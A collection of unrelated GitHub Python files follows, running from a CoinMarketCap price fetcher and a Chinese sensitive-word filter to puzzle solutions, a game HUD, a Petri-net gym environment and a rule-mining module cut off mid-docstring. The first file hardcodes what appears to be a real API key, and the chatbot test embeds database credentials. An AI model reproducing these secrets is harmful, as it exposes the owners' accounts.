+{"seq_id":"2705195016","text":"\r\nimport requests\r\nimport json\r\n\r\n\r\nAPI_KEY = \"4b9b2e12-caac-4075-8c5b-8633b0163a1f\"\r\n\r\n\r\ndef get_prices():\r\n url = \"https://pro-api.coinmarketcap.com/v1/exchange/quotes/latest\"\r\n headers = {\r\n \"X-CMC_PRO_API_KEY\": API_KEY,\r\n }\r\n params = {\r\n \"id\": \"1,2,3,4,5,6,7,8,9,10\",\r\n \"symbol\": \"ETH\",\r\n \"convert\": \"USD\",\r\n }\r\n response = requests.get(url, headers=headers, params=params)\r\n response_json = response.json()\r\n\r\n\r\n prices = {}\r\n for exchange in response_json[\"data\"]:\r\n name = exchange[\"name\"]\r\n price = exchange[\"quote\"][\"USD\"][\"price\"]\r\n prices[name] = price\r\n\r\n return prices\r\n\r\n\r\ndef find_arbitrage(prices):\r\n\r\n table = PrettyTable()\r\n table.field_names = [\"Exchange\", \"Price\"]\r\n\r\n\r\n for exchange in prices:\r\n price = prices[exchange]\r\n table.add_row([exchange, price])\r\n\r\n\r\n print(table)\r\n\r\n\r\ndef main():\r\n\r\n prices = get_prices()\r\n\r\n\r\n find_arbitrage(prices)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"rexcelArb/researches","sub_path":"Simple ETH Arb.py","file_name":"Simple ETH Arb.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"73102141990","text":"import jieba\n\n\nclass SensitiveConf(object):\n\n def __init__(self):\n self.mysql = None\n self.debug = None\n\n\nclass SensitiveWordDistinguish(object):\n\n def __init__(self, mysql, debug=False):\n self.mysql = mysql\n\n words_list = list()\n for data in mysql.query_sensitive_word():\n jieba.add_word(data['word'])\n words_list.append(data['word'])\n\n self.jieba = jieba\n self.word_list = words_list\n self.debug = debug\n\n def distinguish(self, ask):\n words = self.jieba.lcut(ask)\n\n sensitive_word = [word for word in words if word in self.word_list]\n include_sensitive = False if len(sensitive_word) == 0 else True\n\n return include_sensitive, sensitive_word\n\n\ndef test(test_sentence):\n from module.core.mysql_exec import Mysql\n from module.core.utterance import Utterance\n\n utterance = Utterance(ask=test_sentence)\n\n mysql = Mysql(host='192.168.10.10', user='chatbot', password='chatbot', db='chatbot')\n sensitive_word_distinguish = SensitiveWordDistinguish(mysql)\n result = sensitive_word_distinguish.distinguish(utterance)\n\n print(\"result: \", result.sensitive_word)\n print(\"sentence: \", test_sentence)\n\n\nif __name__ == '__main__':\n test('气枪非常好')\n print()\n test('你好')\n","repo_name":"boyshen/NLP_project","sub_path":"chinese_chatbot/module/sensitive_word/sensitive_word.py","file_name":"sensitive_word.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"17212165962","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport shutil\nimport copy\nimport json\nsys.path.append(f'{os.environ[\"HOME\"]}/workspace/octotiger-scripts/include')\nfrom script_common import *\n\nbaseline = {\n \"name\": \"lci\",\n \"nnodes_list\": [8],\n \"max_level\": 5,\n \"griddim\": 2,\n \"stop_step\": 30,\n \"zc_threshold\": 8192,\n \"task\": \"rs\",\n \"parcelport\": \"lci\",\n \"protocol\": \"putsendrecv\",\n \"comp_type\": \"queue\",\n \"progress_type\": \"worker\",\n \"prg_thread_num\": \"auto\",\n \"sendimm\": 1,\n \"backlog_queue\": 0,\n \"prepost_recv_num\": 1,\n \"zero_copy_recv\": 1,\n \"match_table_type\": \"hashqueue\",\n \"cq_type\": \"array_atomic_faa\",\n \"reg_mem\": 0,\n \"ndevices\": 4,\n \"ncomps\": 4\n}\n\nconfigs = [\n # baseline,\n {**baseline, \"name\": \"lci_c1\", \"ncomps\": 1},\n {**baseline, \"name\": \"lci_c2\", \"ncomps\": 2},\n {**baseline, \"name\": \"lci_c4\", \"ncomps\": 4},\n # {**baseline, \"name\": \"lci_l5_worker_d1\", \"ndevices\": 1, \"progress_type\": \"worker\"},\n # {**baseline, \"name\": \"lci_l5_worker_d2\", \"ndevices\": 2, \"progress_type\": \"worker\"},\n # {**baseline, \"name\": \"lci_l5_worker_d4\", \"ndevices\": 4, \"progress_type\": \"worker\"},\n # {**baseline, \"name\": \"lci_l5_rp_d1\", \"ndevices\": 1, \"progress_type\": \"rp\"},\n # {**baseline, \"name\": \"lci_l5_rp_d2\", \"ndevices\": 2, \"progress_type\": \"rp\"},\n # {**baseline, \"name\": \"lci_l5_rp_d4\", \"ndevices\": 4, \"progress_type\": \"rp\"},\n # {**baseline, \"name\": \"lci_l5_rp1_d1\", \"ndevices\": 1, \"progress_type\": \"rp\", \"prg_thread_num\": \"1\"},\n # {**baseline, \"name\": \"lci_l5_rp1_d2\", \"ndevices\": 2, \"progress_type\": \"rp\", \"prg_thread_num\": \"1\"},\n # {**baseline, \"name\": \"lci_l5_rp1_d4\", \"ndevices\": 4, \"progress_type\": \"rp\", \"prg_thread_num\": \"1\"},\n]\n\nif __name__ == \"__main__\":\n mkdir_s(\"./run\")\n\n tag = getenv_or(\"RUN_TAG\", \"default\")\n os.environ[\"CURRENT_SCRIPT_PATH\"] = os.path.dirname(os.path.realpath(__file__))\n for config in configs:\n # print(config)\n for nnodes in config[\"nnodes_list\"]:\n run_slurm(tag, nnodes, config)","repo_name":"JiakunYan/octotiger-scripts","sub_path":"rostam/profile/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"12365654741","text":"import pprint\npp = pprint.PrettyPrinter(indent=4)\n\ndef buildPlayerDecks(input):\n player1 = input[1:input.index('')]\n player2 = input[input.index('')+2:]\n\n\n player1 = list(map(int, player1))\n player2 = list(map(int, player2))\n\n return player1, player2\n\ndef takeOneStep(player1, player2):\n player1_card = player1.pop(0)\n player2_card = player2.pop(0)\n\n if player1_card > player2_card:\n player1.extend([player1_card, player2_card])\n if player2_card > player1_card:\n player2.extend([player2_card, player1_card])\n\ndef playFullGame(player1, player2):\n while player1 and player2:\n takeOneStep(player1, player2)\n\ndef calculatePlayerScore(player):\n total = 0\n for i in range(len(player), 0, -1):\n total += i * player[len(player) - i]\n return total\n\ndef a(input):\n # pp.pprint(input)\n player1, player2 = buildPlayerDecks(input)\n # pp.pprint(player1)\n # pp.pprint(player2)\n playFullGame(player1, player2)\n # pp.pprint(player1)\n # pp.pprint(player2)\n if player1:\n return calculatePlayerScore(player1)\n return calculatePlayerScore(player2)\n","repo_name":"EggheadJohnson/AdventOfCode2020","sub_path":"22/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11079372236","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n File Name: singleNumber\n Author : jing\n Date: 2020/3/19\n\n https://leetcode-cn.com/explore/interview/card/tencent/223/math-and-numbers/940/\n\n 找出只出现一次的数\n\"\"\"\n\n\nclass Solution:\n def singleNumber(self, nums):\n result = 0\n for num in nums:\n result = result ^ num\n return result\n","repo_name":"summer-vacation/AlgoExec","sub_path":"tencent/math_and_digit/singleNumber.py","file_name":"singleNumber.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"17445547758","text":"from pyglet import gl\n\nfrom .constants import SEA_LEVEL, SCREEN_SIZE\nfrom .primitives import Label, Rectangle\nfrom .camera import Rect\nfrom .vector import v\n\n\nclass GameHud(object):\n def __init__(self, world):\n self.world = world\n\n w, h = SCREEN_SIZE\n r = Rect(v(0, 0), v(250, 113))\n r = r.translate(v(8, h - r.height - 8))\n self.infobox = Rectangle(r, [(0, 0, 0, 0.33)])\n\n self.altlabel = Label(\n text='Altitude:',\n x=20,\n y=h - 35\n )\n self.distlabel = Label(\n text='Distance:',\n x=20,\n y=h - 70\n )\n self.fuellabel = Label(\n text='',\n x=20,\n y=h - 105\n )\n\n self.controllers = []\n\n def set_controllers(self, controllers):\n self.controllers = controllers\n\n def draw(self):\n alt = (self.world.squid.position.y - SEA_LEVEL - 15) * 0.1\n if self.world.goal:\n dist = abs(self.world.goal.left - self.world.squid.position.x) * 0.1\n self.distlabel.document.text = 'Target: %dm' % dist\n else:\n dist = (self.world.squid.position.x - 150) * 0.1\n self.distlabel.document.text = 'Distance: %dm' % dist\n\n if alt < 0:\n self.altlabel.document.text = 'Depth: %dm' % (-alt)\n else:\n self.altlabel.document.text = 'Altitude: %dm' % alt\n\n self.fuellabel.document.text = 'Fuel: %0.1fkg' % self.world.squid.fuel\n if self.world.squid.fuel:\n self.fuellabel.color = (255, 255, 255, 255)\n else:\n if self.world.squid.need_fuel():\n self.fuellabel.color = (255, 0, 0, 255)\n else:\n self.fuellabel.document.text = 'Fuel: N/A'\n self.infobox.draw()\n self.altlabel.draw()\n self.distlabel.draw()\n self.fuellabel.draw()\n\n if self.controllers:\n gl.glPushMatrix()\n gl.glTranslatef(SCREEN_SIZE[0] - 74, 10, 0)\n for controller in reversed(self.controllers):\n controller.draw()\n gl.glTranslatef(-74, 0, 0)\n gl.glPopMatrix()\n","repo_name":"lordmauve/korovic","sub_path":"korovic/hud.py","file_name":"hud.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"73821035108","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\n\nimport numpy as np\nfrom gspn_lib import gspn_tools\nimport sys\n\nclass MultiGSPNenv_v1(gym.Env):\n metadata = {'render.modes': ['human']}\n\n def __init__(self, gspn_model=None, gspn_path=None, n_locations=None, n_robots=None, actions_maps=None,\n reward_function=None, use_expected_time=False, verbose=False, idd=None):\n print('Multi GSPN Gym Env V1')\n self.id = idd\n self.verbose = verbose\n self.n_robots = n_robots\n self.n_locations = n_locations\n self.use_expected_time = use_expected_time\n self.actions_id_to_name = actions_maps[0]\n self.actions_name_to_id = actions_maps[1]\n\n if not reward_function:\n raise Exception('Please select one reward function: either 1 or 2')\n self.reward_function_type = reward_function\n\n if gspn_path != None:\n pn_tool = gspn_tools.GSPNtools()\n self.mr_gspn = pn_tool.import_greatspn(gspn_path)[0]\n # pn_tool.draw_gspn(mr_gspn)\n elif gspn_model != None:\n self.mr_gspn = gspn_model\n else:\n raise Exception('Please provide a GSPN object or a GSPN path of the environment model.')\n\n # Init timestamp\n self.timestamp = 0\n\n # [max_n_tokens_in_place0, max_n_tokens_in_place1, ... max_n_tokens_in_placen]\n # we approximate this to: [n_robots, n_robots, ... nrobots]\n self.observation_space = spaces.MultiDiscrete(nvec=[n_robots]*len(self.mr_gspn.get_current_marking()))\n n_actions = len(self.actions_id_to_name.keys())\n # {0,1,...,n_actions}\n self.action_space = spaces.Discrete(n_actions)\n\n self.enabled_parallel_transitions = {}\n\n def step(self, action):\n # get disabled actions in current state\n disabled_actions_names, disabled_actions_indexes = self.get_disabled_actions()\n\n # get current state\n current_state = self.get_current_state()\n if self.verbose:\n print('S: ', current_state)\n # print('Enabled Timed transitions : ', self.enabled_parallel_transitions)\n\n # map input action to associated transition\n if action in disabled_actions_indexes:\n transition = None\n else:\n transition = self.action_to_transition(action)\n if self.verbose:\n print('Action: ', action, transition)\n\n if transition != None:\n # apply action\n self.mr_gspn.fire_transition(transition)\n\n # get execution time (until the next decision state)\n # get also the sequence of the fired transitions ['t1', 't2', ...]\n elapsed_time, fired_transitions = self.execute_actions(use_expected_time=self.use_expected_time)\n\n reward = self.reward_function(current_state, transition, elapsed_time)\n\n # in a MRS the fired timed transition may not correspond to the selected action\n # this is the expected time that corresponds to the selected action\n action_expected_time = self.get_action_time(transition)\n\n self.timestamp += elapsed_time\n else:\n raise Exception('Disabled transition selected! This is not possible.')\n\n if self.verbose:\n print('Reward: ', reward)\n print('Timestamp: ', self.timestamp)\n print('Action expected time: ', action_expected_time)\n # print(\"S actions disabled: \", disabled_actions_names)\n\n # get enabled actions in the next state\n next_state_enabled_actions_names, next_state_enabled_actions_indexes = self.get_enabled_actions()\n\n # get next state\n next_state = self.marking_to_state()\n # next_state_string = self.get_current_state()\n if self.verbose:\n print(\"S': \", self.get_current_state())\n print(\"Available actions in s': \", next_state_enabled_actions_names)\n print()\n\n episode_done = False\n\n return next_state, reward, episode_done, \\\n {'timestamp': self.timestamp,\n 'disabled_actions': (disabled_actions_names, disabled_actions_indexes),\n 'next_state_enabled_actions': (next_state_enabled_actions_names, next_state_enabled_actions_indexes),\n 'action_time': action_expected_time,\n 'fired_transitions': fired_transitions,\n 'action_to_transition': transition}\n\n def reset(self):\n self.timestamp = 0.0\n self.mr_gspn.reset_simulation()\n next_state = self.marking_to_state()\n self.enabled_parallel_transitions = {}\n\n # get enabled actions in the next state\n next_state_enabled_actions_names, next_state_enabled_actions_indexes = self.get_enabled_actions()\n\n return next_state, {'timestamp': self.timestamp, 'actions_info': [],\n 'disabled_actions': (None, None),\n 'next_state_enabled_actions': (\n next_state_enabled_actions_names, next_state_enabled_actions_indexes),\n 'action_time': None}\n\n def render(self, mode='human'):\n raise Exception('Rendering not implemented')\n\n def close(self):\n self.reset()\n # print('Au Revoir Shoshanna!')\n\n def get_current_state(self):\n return self.mr_gspn.get_current_marking(sparse_marking=True)\n\n def action_to_transition(self, action):\n return self.actions_id_to_name[int(action)]\n\n def marking_to_state(self):\n # map dict marking to list marking\n marking_dict = self.mr_gspn.get_current_marking(sparse_marking=True)\n state = [0]*len(self.mr_gspn.get_current_marking().keys())\n for place_name, number_robots in marking_dict.items():\n token_index = self.mr_gspn.places_to_index[place_name]\n state[token_index] = number_robots\n\n return state\n\n def reward_function(self, sparse_state=None, transition=None, elapsed_time=0.0):\n if self.reward_function_type == 1:\n reward = 0.0\n\n if 'Insp' in transition:\n reward += 10.0\n\n elif self.reward_function_type == 2:\n reward = 0.0\n\n if 'Insp' in transition:\n reward += 500.0\n elif ('Charge' in transition) and (not ('Mobile' in transition)):\n reward += 100.0\n elif (not ('Bat' in transition)) and (not ('Mobile' in transition)):\n reward -= 10.0\n else:\n reward = 0.0\n\n if 'Insp' in transition:\n reward += 10.0\n\n robots_discharged = 0\n for local_state, robots in sparse_state.items():\n if 'Low' in local_state:\n robots_discharged += robots\n\n reward -= robots_discharged*elapsed_time\n\n return reward\n\n def fire_timed_transitions(self, enabled_timed_transitions, use_expected_time):\n if use_expected_time:\n # convert the rate into expected time and store that transition if it was not already stored\n for tr_name, tr_rate in enabled_timed_transitions.copy().items():\n if tr_name not in self.enabled_parallel_transitions:\n self.enabled_parallel_transitions[tr_name] = [1.0 / tr_rate]\n\n n_sampled_times = len(self.enabled_parallel_transitions[tr_name])\n tr_index = self.mr_gspn.transitions_to_index[tr_name]\n arcs_in = self.mr_gspn.get_arc_in_m()\n places_dict = self.mr_gspn.get_places()\n input_place_ratios = []\n sample_new_time = True\n for i, tr_coord in enumerate(arcs_in.coords[1]):\n if tr_coord == tr_index:\n place_index = arcs_in.coords[0][i]\n place_name = self.mr_gspn.index_to_places[place_index]\n n_tokens = places_dict[place_name]\n arc_weight = arcs_in.data[i]\n ratio = int(n_tokens/arc_weight)\n # the ratio gives us the number of sampled times that must exist in the\n # parallel dict, for this specific transition\n input_place_ratios.append(ratio)\n if ratio <= n_sampled_times:\n sample_new_time = False\n break\n # sample the amount necessary such that the number of\n # sampled times equals the smallest the place ratio\n if sample_new_time and len(input_place_ratios) > 0:\n while len(self.enabled_parallel_transitions[tr_name]) < min(input_place_ratios):\n self.enabled_parallel_transitions[tr_name].append(1.0 / tr_rate)\n\n else:\n # convert the rate into sampled elapsed time\n # sample from each exponential distribution prob_dist(x) = lambda * exp(-lambda * x)\n # in this case the beta rate parameter is used instead, where beta = 1/lambda\n # store enabled transition if it was not already stored\n for tr_name, tr_rate in enabled_timed_transitions.copy().items():\n if tr_name not in self.enabled_parallel_transitions:\n self.enabled_parallel_transitions[tr_name] = [np.random.exponential(scale=(1.0 / tr_rate),\n size=None)]\n\n n_sampled_times = len(self.enabled_parallel_transitions[tr_name])\n tr_index = self.mr_gspn.transitions_to_index[tr_name]\n arcs_in = self.mr_gspn.get_arc_in_m()\n places_dict = self.mr_gspn.get_places()\n input_place_ratios = []\n sample_new_time = True\n for i, tr_coord in enumerate(arcs_in.coords[1]):\n if tr_coord == tr_index:\n place_index = arcs_in.coords[0][i]\n place_name = self.mr_gspn.index_to_places[place_index]\n n_tokens = places_dict[place_name]\n arc_weight = arcs_in.data[i]\n ratio = int(n_tokens / arc_weight)\n # the ratio gives us the number of sampled times that must exist in the\n # parallel dict, for this specific transition\n input_place_ratios.append(ratio)\n if ratio <= n_sampled_times:\n sample_new_time = False\n break\n # sample the amount necessary such that the number of\n # sampled times equals the smallest place ratio\n if sample_new_time and len(input_place_ratios) > 0:\n while len(self.enabled_parallel_transitions[tr_name]) < min(input_place_ratios):\n self.enabled_parallel_transitions[tr_name].append(np.random.exponential(scale=(1.0 / tr_rate),\n size=None))\n # delete the transitions that were enabled, didn't fire and are not longer enabled\n disabled_transitions = set(self.enabled_parallel_transitions.keys())-set(enabled_timed_transitions.keys())\n for tr_name in disabled_transitions:\n del self.enabled_parallel_transitions[tr_name]\n\n # select the transition with the lowest execution time\n execution_time = np.inf\n for tr_name, tr_time in self.enabled_parallel_transitions.items():\n new_min_time = min(tr_time)\n if new_min_time < execution_time:\n timed_transition = tr_name\n execution_time = new_min_time\n\n transitions_to_fire = []\n transitions_to_fire.append(timed_transition)\n\n # delete transition to be fired\n if len(self.enabled_parallel_transitions[timed_transition]) > 1:\n self.enabled_parallel_transitions[timed_transition].remove(execution_time)\n else:\n del self.enabled_parallel_transitions[timed_transition]\n\n # decreased elapsed time for the remaining enabled transitions\n for tr_name, tr_exp_time in self.enabled_parallel_transitions.copy().items():\n new_tr_time = list(np.array(tr_exp_time) - execution_time)\n if any(i <= 0 for i in new_tr_time):\n # according to PN formalism there are never two timed transitions\n # with the same elapsed time\n # instead we should sum a very small time (e.g. 1e-6)\n # to ensure that only 1 transition fires at each time\n # when using expected time this arises more often\n pruned_new_tr_time = []\n for remaining_time in new_tr_time:\n if remaining_time <= 0:\n # transitions_to_fire.append(tr_name)\n pruned_new_tr_time.append(1e-6)\n else:\n pruned_new_tr_time.append(remaining_time)\n\n if len(pruned_new_tr_time) > 0:\n self.enabled_parallel_transitions[tr_name] = pruned_new_tr_time\n else:\n del self.enabled_parallel_transitions[tr_name]\n else:\n self.enabled_parallel_transitions[tr_name] = new_tr_time\n\n for transition_name in transitions_to_fire:\n self.mr_gspn.fire_transition(transition_name)\n return execution_time, transitions_to_fire\n\n def fire_random_switch(self, random_switch):\n if len(random_switch) > 1:\n s = sum(random_switch.values())\n random_switch_id = list(random_switch.keys())\n random_switch_prob = np.zeros(len(random_switch))\n # normalize the associated probabilities\n for idx, tr_info in enumerate(random_switch.items()):\n tr_name = tr_info[0]\n tr_weight = tr_info[1]\n random_switch_id[idx] = tr_name\n random_switch_prob[idx] = tr_weight / s\n\n # Draw from all enabled immediate transitions\n firing_transition = np.random.choice(a=random_switch_id, size=None, p=random_switch_prob)\n else:\n # Fire the only available immediate transition\n firing_transition = list(random_switch.keys())[0]\n\n self.mr_gspn.fire_transition(firing_transition)\n\n def check_actions_state(self, enabled_imm_transitions):\n action_enabled = False\n random_switch_available = False\n for tr_name, tr_rate in enabled_imm_transitions.items():\n if tr_rate == 0:\n action_enabled = True\n elif tr_rate != 0:\n random_switch_available = True\n return action_enabled, random_switch_available\n\n def execute_actions(self, use_expected_time=False):\n enabled_timed_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n\n # check if there is at least one imm transition with weight != 0 and check if there is one with weight == 0\n enabled_actions, random_switch = self.check_actions_state(enabled_imm_transitions)\n\n elapsed_time = 0\n fired_transitions = []\n while random_switch or (not enabled_actions):\n while random_switch:\n self.fire_random_switch(enabled_imm_transitions)\n enabled_timed_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n enabled_actions, random_switch = self.check_actions_state(enabled_imm_transitions)\n\n while (enabled_timed_transitions and not enabled_actions and not random_switch):\n action_elapsed_time, tr_fired = self.fire_timed_transitions(enabled_timed_transitions,\n use_expected_time)\n elapsed_time += action_elapsed_time\n fired_transitions += tr_fired\n enabled_timed_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n enabled_actions, random_switch = self.check_actions_state(enabled_imm_transitions)\n\n return elapsed_time, fired_transitions\n\n def get_disabled_actions(self):\n enabled_actions_names, enabled_actions_indexes = self.get_enabled_actions()\n\n disabled_actions_indexes = list(set(self.actions_id_to_name.keys()) - set(enabled_actions_indexes))\n disabled_actions_names = list(set(self.actions_name_to_id.keys()) - set(enabled_actions_names))\n\n return disabled_actions_names, disabled_actions_indexes\n\n def get_enabled_actions(self):\n enabled_exp_transitions, enabled_imm_transitions = self.mr_gspn.get_enabled_transitions()\n\n enabled_actions_indexes = []\n enabled_actions_names = []\n for tr_name, tr_rate in enabled_imm_transitions.items():\n if tr_rate == 0:\n enabled_actions_names.append(tr_name)\n enabled_actions_indexes.append(self.actions_name_to_id[tr_name])\n\n return enabled_actions_names, enabled_actions_indexes\n\n def get_action_time(self, fired_transition):\n associated_timed_tr = fired_transition + '_Finished'\n transition_rate = self.mr_gspn.get_transition_rate(associated_timed_tr)\n action_expected_time = 1.0/transition_rate\n return action_expected_time\n\n # def seed(self, seed=None):\n # self.np_random, seed = seeding.np_random(seed)\n # return [seed]","repo_name":"cazevedo/gspn-gym-env","sub_path":"gspn_gym_env/envs/MultiGSPNenv_v1.py","file_name":"MultiGSPNenv_v1.py","file_ext":"py","file_size_in_byte":17697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"23887462738","text":"import cPickle\nimport string\nfrom nltk.stem.porter import PorterStemmer as ps\nfrom nltk.corpus import stopwords\n\ndef tok_tweet(tweet):\n stemmer=ps()\n tweet = tweet.strip()\n words = tweet.split()\n tokenlist = []\n exclude = set(string.punctuation)\n punc = string.punctuation\n punc = punc.replace('#','')\n exclude_punc = set(punc)\n\n for word in words:\n word = word.strip()\n word = word.lower()\n\n if word in stopwords.words('english'):\n continue\n\n #Replace URLs with @http and then with blank\n if word.startswith('www') or word.startswith('http') or word.startswith(\"@\") or word.isdigit() or word == 'rt':\n continue #ignore if word is a url, @mention or contains only numbers or is a stopword\n nword = ''.join(ch for ch in word if ch not in exclude_punc)\n tokenlist.append(stemmer.stem(nword))\n tokens= tokenlist\n return ' '.join(tokens)\n\ndef processStatuses(statusFile,textFile):\n corpus = ''\n statuses = cPickle.load(open('data/' + statusFile))\n for status in statuses:\n if status.lang == 'en':\n tweet = tok_tweet(status.text)\n corpus += tweet + ' '\n\n with open('data/'+textFile,'a') as outFile:\n outFile.write(corpus.encode('utf-8'))\n\n return corpus\n\n\n#processStatuses('DendiBoss.p','DendiBoss.out')","repo_name":"viveknabhi/Game-AI-Project","sub_path":"processTweets.py","file_name":"processTweets.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"9736443542","text":"def get_pic():\n return makePicture(pickAFile())\n \ndef betterBnW():\n pic = get_pic()\n pixels = getPixels(pic)\n for p in pixels:\n avg_color = avg_color = (getRed(p)*.299 + getGreen(p)*.587 + getBlue(p)*.114)\n newColor = makeColor(avg_color,avg_color,avg_color)\n setColor(p, newColor)\n return pic\n\n \ndef line_drawing(tolerance):\n drawing = betterBnW()\n width = getWidth(drawing)\n height = getHeight(drawing)\n for x in range(0, width-1):\n for y in range(0, height-1):\n px = getPixel(drawing, x, y)\n main_pixel = getColor(px)\n \n px_right = getPixel(drawing, x+1, y)\n right_pixel = getColor(px_right)\n \n px_bottom = getPixel(drawing, x, y+1)\n bottom_pixel = getColor(px_bottom)\n \n right_distance = distance(main_pixel, right_pixel)\n bottom_distance = distance(main_pixel, bottom_pixel)\n \n if right_distance < tolerance and bottom_distance < tolerance:\n setColor(px, white)\n else:\n setColor(px, black)\n show(drawing)\n \ndef line_drawing2(tolerance):\n drawing = betterBnW()\n width = getWidth(drawing)\n height = getHeight(drawing)\n for x in range(0, width-1):\n for y in range(0, height-1):\n px = getPixel(drawing, x, y)\n main_pixel = getRed(px)\n \n px_right = getPixel(drawing, x+1, y)\n right_pixel = getRed(px_right)\n \n px_bottom = getPixel(drawing, x, y+1)\n bottom_pixel = getRed(px_bottom)\n \n right_distance = abs(main_pixel - right_pixel)\n bottom_distance = abs(main_pixel - bottom_pixel)\n \n if right_distance > tolerance and bottom_distance > tolerance:\n setColor(px, black)\n else:\n setColor(px, white)\n show(drawing)","repo_name":"rogerterrill-csumb/CST205","sub_path":"CST205/linedrawing.py","file_name":"linedrawing.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74410101668","text":"import webbrowser\n\nclass Game():\n \"\"\"This class provides a way to store game related information\"\"\"\n VALID_RATINGS = [\"G\", \"PG\", \"PG-13\", \"R\"]\n\n def __init__(self, game_title, poster_image,\n trailer_youtube):\n \"\"\"Initiates a movie Object with the specified arguments\"\"\"\n self.title = game_title\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n \"\"\"Opens game trailer in the webbrowser\"\"\"\n webbrowser.open(self.trailer_youtube_url)\n","repo_name":"AngelTX/FavoriteGamesWebsite","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73242882470","text":"def merge(s1, s2, s):\n \"\"\"Merge two sorted lists s1, s2 into properly sized list z\"\"\"\n i = j = 0\n while i + j < len(s):\n if j == len(s2) or (i < len(s1) and s1[i] < s2[j]):\n s[i+j] = s1[i] # copy ith element of s1 as next item of s\n i += 1\n else:\n s[i+j] = s2[j] # copy jth element of s2 as next item of s\n j += 1\n\n","repo_name":"asadrazaa1/Python-Data-Structures-and-Algorithms","sub_path":"Sortings/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"69880374949","text":"from .rule_mining.frequent_metapath_mining import FrequentMetapathSetMiner\nfrom .rule_mining.unification_mining import MetapathPatternUnificationMiner\nfrom .rule_mining.rule_pruning import RulePruner\nfrom .rule_mining.path_thresholds_optimisation import PathThresholdOptimiser\nfrom .rule_mining.rule_querying import MetapathRuleMatcher\nfrom .rule_mining.rule import Rule\nfrom .model.decision_set_classifier import DecisionSetClassifier\nimport numpy as np\nimport time\n\n__author__ = \"Alexandre Renaux\"\n__copyright__ = \"Copyright (c) 2023 Alexandre Renaux - Universite Libre de Bruxelles - Vrije Universiteit Brussel\"\n__license__ = \"MIT\"\n__version__ = \"1.0.1\"\n\n\ndef train_decision_set_model(relevant_rules, training_positives, training_negatives, sample_to_weight, algo_params, cpu_cores=0):\n \"\"\"\n Utils methods to train a decision set classifier with the given relevant rules and training data.\n\n Parameters:\n - relevant_rules: List of relevant rules for training\n - training_positives: List of positive training instances (gene pairs)\n - training_negatives: List of negative training instances (gene pairs)\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - alpha: Trade-off parameter for combining true positive rate and false positive rate\n\n Returns:\n - rule_set_classifier: Trained rule set classifier\n \"\"\"\n alpha = algo_params[\"alpha\"]\n rule_matcher = MetapathRuleMatcher(algo_params)\n\n sample_list = training_positives + training_negatives\n X_train_list = []\n y_train_list = []\n sample_weight_list = []\n for gene_pair in sample_list:\n X_train_list.append([gene_pair, None])\n y_train_list.append(1 if gene_pair in training_positives else 0)\n if sample_to_weight:\n sample_weight_list.append(sample_to_weight[gene_pair])\n X_train = np.array(X_train_list, dtype=object)\n y_train = np.array(y_train_list)\n sample_weight = np.array(sample_weight_list) if sample_to_weight else None\n\n # Model training\n rule_set_classifier = DecisionSetClassifier(relevant_rules, rule_matcher, alpha, cpu_cores=cpu_cores)\n rule_set_classifier.fit(X_train, y_train, sample_weight=sample_weight)\n\n return rule_set_classifier\n\n\ndef mine_relevant_rules(training_positives, training_negatives, metapath_dict, sample_to_weight, algo_params, sample_name, update_cache=False, pproc=None):\n '''\n Utils method to mine relevant metapath-based rules for the given training data and apply pruning methods.\n\n Parameters:\n - training_positives: List of positive training instances (entity pairs)\n - training_negatives: List of negative training instances (entity pairs)\n - metapath_dict: Dictionary mapping entity pairs to their metapaths\n - sample_to_weight: Dictionary mapping instances to their weights (optional)\n - algo_params: Dictionary of all framework parameters\n - sample_name: Name of the analysis sample (for caching)\n - update_cache: Boolean flag to update the cache\n - pproc: Parallel processing context\n\n Returns:\n - relevant_rules: List of relevant rules\n '''\n rule_list, positive_matches_to_rule_ids, t1 = mine_candidate_rules(training_positives, metapath_dict, sample_to_weight, algo_params, sample_name, pproc=pproc, update_cache=update_cache)\n relevant_rules, t2 = apply_and_prune_rules(rule_list, positive_matches_to_rule_ids, training_negatives, metapath_dict, sample_to_weight, algo_params, sample_name, pproc=pproc, update_cache=update_cache)\n elapsed_time = t1 + t2\n return relevant_rules, elapsed_time\n\n\ndef mine_candidate_rules(training_positives, metapath_dict, sample_to_weight, algo_params, sample_name, update_cache=False, pproc=None):\n '''\n Utils method to mine candidate metapath-based rules for the given training data.\n Parameters:\n - training_positives: List of positive training instances (entity pairs)\n - metapath_dict: Dictionary mapping entity 